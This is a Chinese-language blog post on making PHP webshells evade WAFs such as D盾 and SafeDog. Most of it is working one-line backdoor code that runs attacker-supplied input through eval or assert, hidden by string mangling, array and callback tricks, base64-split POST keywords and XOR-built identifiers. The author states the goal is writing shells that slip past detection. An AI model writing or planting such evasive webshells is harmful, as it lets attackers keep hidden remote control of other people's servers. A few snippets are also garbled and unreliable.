免杀webshell的一些研究


前⾔

webshell免杀已经是⼀个⽼⽣⻓谈的话题了,现在的各种waf都已经可以识别常⻅webshell及其各种变形,也出现了基于沙箱技术和机器学习的waf。webshell的免杀⼀直在⼀个对抗的过沉中,今天新出的⼀个免杀webshell,可能明天就加⼊了waf的规则库中,所以我们需要尽可能多的掌握webshell免杀技巧并且⾃⼰去写⼀些webshell。能够免杀的webshell尽可能的⼩范围使⽤,⼤量使⽤必然会被waf识别并加⼊查杀规则库。

前期准备

本次测试过程中使⽤了常⻅的两个免费waf:安全狗和D盾。综合测试的结果是D盾的免杀能⼒更强,所以能过D盾webshell基本都可以过安全狗。webshell即使可以逃过D盾的查杀,也⽆法进⾏系统的命令执⾏,因为D盾还有⼀层防⽕墙。如何绕过D盾防⽕墙和360等杀毒软件还需继续学习。

webshell原理

根据功能的差别可以将webshell分为⼀句话⽊⻢,⼩⻢和⼤⻢。对于这些⻢的查杀原理基本是⼀样的,只不过代码 越多暴露的特性就会越多,⾃然就越容易被查杀。本次研究⼀句话⽊⻢的免杀,重点介绍⼀句话⽊⻢的原理。 ⼀句话⽊⻢是最简单的webshell,它的实现也相当容易,最简单的⼀句话⽊⻢如下:

@eval($_REQUEST['x']);

或者:

assert($_REQUEST['x']);

assert可以换成system等可以执⾏系统命令的PHP函数。

毫⽆疑问,这中简单原始的webshell肯定会被免杀:

202003182155{second

202003182156{second

eval和assert

关于eval函数

eval 是⼀个语⾔构造器⽽不是⼀个函数,不能被 可变函数 调⽤ 可变函数:通过⼀个变量,获取其对应的变量值,然后通过给该值增加⼀个括号(),让系统认为该值是⼀个函数,从⽽当做函数来执⾏

通俗的说⽐如你<?php $a=eval;$a()?>这样是不⾏的.也造就了⽤eval的话达不到assert的灵活,但是在php7.1以上assert已经不能使用了。

关于assert函数

assert()回调函数在构建⾃动测试套件的时候尤其有⽤,因为它们允许你简易地捕获传⼊断⾔的代码,并包含断⾔的位置信息。 当信息能够被其他⽅法捕获,使⽤断⾔可以让它更快更⽅便!

免杀⽅法

函数替换

例如将$_POST替换为$_REQUEST

202003182201{second

虽然D盾还是检测出来为后⻔,但是级别已经降低了为4级,可⻅D盾对POST更为敏感,这⾥显然不能免杀,但是可以作为⼀种思路来配合后续的其它⽅法免杀。

字符串变形

php造作字符串的函数有:

ucwords() //函数把字符串中每个单词的⾸字符转换为⼤写。
ucfirst() //函数把字符串中的⾸字符转换为⼤写。
trim() //函数从字符串的两端删除空⽩字符和其他预定义字符。
substr_replace() //函数把字符串的⼀部分替换为另⼀个字符串
substr() //函数返回字符串的⼀部分。
strtr() //函数转换字符串中特定的字符。
strtoupper() //函数把字符串转换为⼤写。
strtolower() //函数把字符串转换为⼩写。
strtok() //函数把字符串分割为更⼩的字符串
str_rot13() //函数对字符串执⾏ ROT13 编码。

通过字符串函数对关键字assert$_POST进⾏变形,如:

<?php
$a = substr_replace("assexx","rt",4);
$a($_POST['x']);
?>

202003182204{second

D盾检测出为1级,其实1级D盾就不会拦截,可以达到免杀效果:

202003182205{second

经过测试,D盾只要遇到这种疑似变量就会报危险,如下图,即使这个变量是⼀个⽆害的字符串,所以在这个问题 上⽆需深究。

202003182206{second

⾃定义函数绕过

<?php
function sys(){ return 'al($_';
}
@eval('@ev'.sys().'POST[x]);');
?>

利⽤数组免杀

<?php
$a = substr_replace("assexx","rt",4);
$b=[''=>$a($_POST['x'])];
?>

202003182208{second

还可以给数组加点料:

<?php
$a = substr_replace("assexx","rt",4);
$c = $_REQUEST['e'];
if ($c="test"){
$b=[$c=>$a($_POST['x'])];
}

202003182209{second

除此外还可以使⽤多维数组:

<?php
$b = substr_replace("assexx","rt",4);
$a = array($arrayName = array('a' => $b($_POST['x'])));
?>

利⽤回调函数免杀

常⽤的php回调函数有:

call_user_func_array()
call_user_func()
array_filter() array_walk()
array_map()
registregister_shutdown_function()
register_tick_function()
filter_var()
filter_var_array()
uasort()
uksort()
array_reduce()
array_walk()
array_walk_recursive()

注意常⽤的回调函数⼤部分都已经加⼊了免杀套餐,所以我们需要尽可能的去寻找⽐较⽣僻的回调函数。

例如:

<?php
array_intersect_ukey(array($_POST["x"] => 1), array(1), "assert");
?>

202003182211{second

回调函数配合⽅法或类

例如回调函数配合⽅法:

<?php
function test($a){
array_intersect_ukey(array($a => 1), array(1), "assert");
}
test($_POST["x"]);
?>

使⽤特殊字符

特殊字符有:\n,\r,\t等。

<?php
$a = $_POST['x'];
$b = "\n"; function a($ss){
$d=substr_replace("assexx","rt",4); 
return $d($ss);
}
a($b.=$a);
?>

经测试特殊字符的免杀性不强,勉强可以使⽤。

利⽤POST包获取关键字

<?php
$decrpt = $_POST['x'];
$decrps = $_POST['y'];
$arrs = explode("|", $decrpt)[1];
$arrs = explode("|", base64_decode($arrs));
$arrt = explode("|", $decrps)[1];
$arrt = explode("|", base64_decode($arrt)); call_user_func($arrs[0],$arrt[0]);
?>

202003182213{second

也可以使⽤⾃定义的加密⽅式,post包传⼊参数再由webshell解密,此种⽅式现有的waf查杀能⼒基本为0.

⽆字符特征⻢

利⽤异或或者编码等⽅式构造⽆字符的webshell,例如:

<?php
$___=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';
$_='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $_='_POST';
$__=$$__;
$___($___[_]); // assert($_POST[_]);
?>

异或绕过

github上有个项⽬可以使⽤python⽣成异或免杀的webshell,不过其特征已被捕获,现在已经⽆法过D盾了。github地址
不过可以使⽤下⾯这篇⽂章的思路来进⾏修改重新免杀:随机异或⽆限免杀D盾之再免杀

举个例⼦:

<?php
function v01cano($aaa,$sss, $bbb){
$ccc=$bbb;
array_intersect_ukey($aaa, $sss, $ccc);
}
$_0='&'^"\x47";
$_1='C'^"\x30";
$_2='A'^"\x32";
$_3='v'^"\x13";
$_4='J'^"\x38";
$_5='f'^"\x12";
$ddd=$_0.$_1.$_2.$_3.$_4.$_5; v01cano(array($_POST['x'] => 1),array(1), $ddd);

或者:

<?php
@$_++; // $_ = 1
$_=("#"^"|"); // $_= _
$_.=("."^"~"); // _P
$_.=("/"^"`"); // _PO
$_.=("|"^"/"); // _POS
$_.=("{"^"/"); // _POST
@eval(${$ }[!$_]);//mima:0

PHP7.1之后免杀困境

php7.1之后我们已经不能使⽤强⼤的assert函数了,waf只要把函数封死就可以有效的阻⽌webshell免杀,⽽eval并没有assert那么灵活。后期⼤家可能更加倾向使⽤⼤⻢。

参考⽂章


文章作者: darkless
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 darkless !
评论
 上一篇
PHP XXE 利用过程演示 PHP XXE 利用过程演示
XXE简介在理解什么是XXE之前首先要知道什么是XML,XXE的全称为XML External Entity Injection,就是XML外部实体注入。XML是一种通用的数据交换语言,当处理数据时没有限制外部实体的使用,就可能会导致攻击者
下一篇 
hashcat rule的使用 hashcat rule的使用
hashcat简介hahcat自称是世界上密码破解最快的工具,hashcat支持多种密码散列算法,可以使用CPU或者GPU进行破解且破解规则灵活。关于hashcat破解密码的使用可以参考:Hashcat的使用手册总结 hashcat ru
  目录